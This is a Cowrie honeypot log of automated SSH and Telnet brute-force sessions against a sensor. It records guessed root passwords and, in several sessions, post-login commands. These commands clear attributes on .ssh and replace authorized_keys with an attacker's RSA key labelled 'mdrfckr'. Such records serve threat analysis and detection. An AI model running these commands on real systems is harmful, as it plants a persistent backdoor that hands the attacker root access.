256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:13:38.895396Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd123!@#","message":"login attempt [root/Abcd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:13:40.009416Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:13:40.567075Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:13:40.567763Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:13:40.568562Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:13:40.837714Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:13:41.499604Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:13:41.500295Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:13:41.770433Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:13:41.771356Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":37390,"dst_ip":"1.2.3.4","dst_port":22,"session":"c72751444abc","protocol":"ssh","message":"New connection: 27.112.78.245:37390 (1.2.3.4:22) [session: c72751444abc]","sensor":"my-vps","timestamp":"2025-08-26T00:13:42.028661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:13:42.029543Z","src_ip":"27.112.78.245","session":"c72751444abc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:13:42.289007Z","src_ip":"27.112.78.245","session":"c72751444abc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:13:43.891855Z","src_ip":"27.112.78.245","session":"c72751444abc"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:13:45.154083Z","src_ip":"27.112.78.245","session":"c72751444abc"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":34684,"dst_ip":"1.2.3.4","dst_port":22,"session":"639d9b6c03f2","protocol":"ssh","message":"New connection: 27.112.78.245:34684 (1.2.3.4:22) [session: 639d9b6c03f2]","sensor":"my-vps","timestamp":"2025-08-26T00:13:45.490554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:13:45.492655Z","src_ip":"27.112.78.245","session":"639d9b6c03f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:13:45.750864Z","src_ip":"27.112.78.245","session":"639d9b6c03f2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:13:46.807255Z","src_ip":"27.112.78.245","session":"639d9b6c03f2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:13:47.067386Z","src_ip":"27.112.78.245","session":"639d9b6c03f2"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:13:47.068968Z","src_ip":"27.112.78.245","session":"aece91468df6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41528,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6cb36b6b6fd","protocol":"telnet","message":"New connection: 212.227.235.229:41528 (1.2.3.4:23) [session: a6cb36b6b6fd]","sensor":"my-vps","timestamp":"2025-08-26T00:15:03.416973Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":35118,"dst_ip":"1.2.3.4","dst_port":22,"session":"f66dc2633bce","protocol":"ssh","message":"New connection: 27.112.78.245:35118 (1.2.3.4:22) [session: f66dc2633bce]","sensor":"my-vps","timestamp":"2025-08-26T00:15:12.437550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:15:12.438761Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:15:12.712095Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.login.success","username":"root","password":"ksk1912","message":"login attempt [root/ksk1912] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:15:13.864623Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:15:14.433103Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:15:14.433801Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:15:14.434783Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:14.719563Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:15:15.383823Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:15:15.384730Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:15:15.661286Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:15.662404Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":44728,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa3c7ff52c6b","protocol":"ssh","message":"New connection: 27.112.78.245:44728 (1.2.3.4:22) [session: fa3c7ff52c6b]","sensor":"my-vps","timestamp":"2025-08-26T00:15:15.932268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:15:15.933004Z","src_ip":"27.112.78.245","session":"fa3c7ff52c6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:15:16.203252Z","src_ip":"27.112.78.245","session":"fa3c7ff52c6b"}
{"eventid":"cowrie.session.closed","duration":13.786071538925171,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:17.202965Z","src_ip":"212.227.235.229","session":"a6cb36b6b6fd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:15:17.327440Z","src_ip":"27.112.78.245","session":"fa3c7ff52c6b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:18.601066Z","src_ip":"27.112.78.245","session":"fa3c7ff52c6b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":44734,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9b6891086e2","protocol":"ssh","message":"New connection: 27.112.78.245:44734 (1.2.3.4:22) [session: c9b6891086e2]","sensor":"my-vps","timestamp":"2025-08-26T00:15:18.870606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:15:18.871541Z","src_ip":"27.112.78.245","session":"c9b6891086e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:15:19.147757Z","src_ip":"27.112.78.245","session":"c9b6891086e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:15:20.286818Z","src_ip":"27.112.78.245","session":"c9b6891086e2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:20.560210Z","src_ip":"27.112.78.245","session":"c9b6891086e2"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:20.561139Z","src_ip":"27.112.78.245","session":"f66dc2633bce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41542,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b7ce8d125fb","protocol":"ssh","message":"New connection: 212.227.235.229:41542 (1.2.3.4:22) [session: 7b7ce8d125fb]","sensor":"my-vps","timestamp":"2025-08-26T00:15:37.386716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:15:38.398316Z","src_ip":"212.227.235.229","session":"7b7ce8d125fb"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T00:15:38.399324Z","src_ip":"212.227.235.229","session":"7b7ce8d125fb"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:39.808727Z","src_ip":"212.227.235.229","session":"7b7ce8d125fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39129,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f2baf4d892","protocol":"ssh","message":"New connection: 212.227.125.160:39129 (1.2.3.4:22) [session: 91f2baf4d892]","sensor":"my-vps","timestamp":"2025-08-26T00:15:41.358854Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:15:41.361401Z","src_ip":"212.227.125.160","session":"91f2baf4d892"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39404,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5c206119f53","protocol":"ssh","message":"New connection: 212.227.125.160:39404 (1.2.3.4:22) [session: f5c206119f53]","sensor":"my-vps","timestamp":"2025-08-26T00:15:41.470619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:15:41.471351Z","src_ip":"212.227.125.160","session":"f5c206119f53"}
